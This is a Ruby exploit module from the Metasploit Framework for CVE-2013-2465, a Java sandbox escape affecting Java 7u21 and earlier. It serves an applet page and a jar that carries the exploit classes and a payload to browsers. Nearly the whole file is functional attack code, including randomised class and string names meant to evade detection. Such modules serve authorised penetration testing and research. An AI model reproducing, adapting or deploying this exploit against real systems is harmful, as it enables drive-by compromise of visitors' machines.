metasploit-gs/modules/exploits/multi/browser/java_storeimagearray.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default

	include Msf::Exploit::Remote::HttpServer::HTML

	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({ :javascript => false })

	def initialize( info = {} )
		super( update_info( info,
			'Name'          => 'Java storeImageArray() Invalid Array Indexing Vulnerability',
			'Description'   => %q{
				This module abuses an Invalid Array Indexing Vulnerability on the
				static function storeImageArray() function in order to cause a
				memory corruption and escape the Java Sandbox. The vulnerability
				affects Java version 7u21 and earlier. The module, which doesn't bypass
				click2play, has been tested successfully on Java 7u21 on Windows and
				Linux systems.
			},
			'License'       => MSF_LICENSE,
			'Author'        =>
				[
					'Unknown',  # From PacketStorm
					'sinn3r', # Metasploit
					'juan vazquez' # Metasploit
				],
			'References'    =>
				[
					[ 'CVE', '2013-2465' ],
					[ 'OSVDB', '96269' ],
					[ 'EDB', '27526' ],
					[ 'URL', 'http://packetstormsecurity.com/files/122777/' ],
					[ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/2a9c79db0040' ]
				],
			'Platform'      => [ 'java', 'win', 'linux' ],
			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
			'Targets'       =>
				[
					[ 'Generic (Java Payload)',
						{
							'Arch'     => ARCH_JAVA,
							'Platform' => 'java'
						}
					],
					[ 'Windows Universal',
						{
							'Arch'     => ARCH_X86,
							'Platform' => 'win'
						}
					],
					[ 'Linux x86',
						{
							'Arch'     => ARCH_X86,
							'Platform' => 'linux'
						}
					]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Aug 12 2013'
			))
	end

	def setup
		path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2465", "Exploit.class")
		@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
		path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2465", "Exploit$MyColorModel.class")
		@color_model_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
		path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2465", "Exploit$MyColorSpace.class")
		@color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

		@exploit_class_name = rand_text_alpha("Exploit".length)
		@color_model_class_name = rand_text_alpha("MyColorModel".length)
		@color_space_class_name = rand_text_alpha("MyColorSpace".length)

		@exploit_class.gsub!("Exploit", @exploit_class_name)
		@exploit_class.gsub!("MyColorModel", @color_model_class_name)
		@exploit_class.gsub!("MyColorSpace", @color_space_class_name)

		@color_model_class.gsub!("Exploit", @exploit_class_name)
		@color_model_class.gsub!("MyColorModel", @color_model_class_name)
		@color_model_class.gsub!("MyColorSpace", @color_space_class_name)


		@color_space_class.gsub!("Exploit", @exploit_class_name)
		@color_space_class.gsub!("MyColorModel", @color_model_class_name)
		@color_space_class.gsub!("MyColorSpace", @color_space_class_name)

		super
	end

	def on_request_uri( cli, request )
		print_debug("Requesting: #{request.uri}")
		if request.uri !~ /\.jar$/i
			if not request.uri =~ /\/$/
				print_status("Sending redirect...")
				send_redirect(cli, "#{get_resource}/", '')
				return
			end

			print_status("Sending HTML...")
			send_response_html(cli, generate_html, {'Content-Type'=>'text/html'})
			return
		end

		print_status("Sending .jar file...")
		send_response(cli, generate_jar(cli), {'Content-Type'=>'application/java-archive'})

		handler( cli )
	end

	def generate_html
		jar_name = rand_text_alpha(5+rand(3))
		html = %Q|<html>
		<head>
		</head>
		<body>
		<applet archive="#{jar_name}.jar" code="#{@exploit_class_name}" width="1000" height="1000">
		</applet>
		</body>
		</html>
		|
		html = html.gsub(/^\t\t/, '')
		return html
	end

	def generate_jar(cli)

		p = regenerate_payload(cli)
		jar  = p.encoded_jar

		jar.add_file("#{@exploit_class_name}.class", @exploit_class)
		jar.add_file("#{@exploit_class_name}$#{@color_model_class_name}.class", @color_model_class)
		jar.add_file("#{@exploit_class_name}$#{@color_space_class_name}.class", @color_space_class)
		metasploit_str = rand_text_alpha("metasploit".length)
		payload_str = rand_text_alpha("payload".length)
		jar.entries.each { |entry|
			entry.name.gsub!("metasploit", metasploit_str)
			entry.name.gsub!("Payload", payload_str)
			entry.data = entry.data.gsub("metasploit", metasploit_str)
			entry.data = entry.data.gsub("Payload", payload_str)
		}
		jar.build_manifest

		return jar.pack
	end

end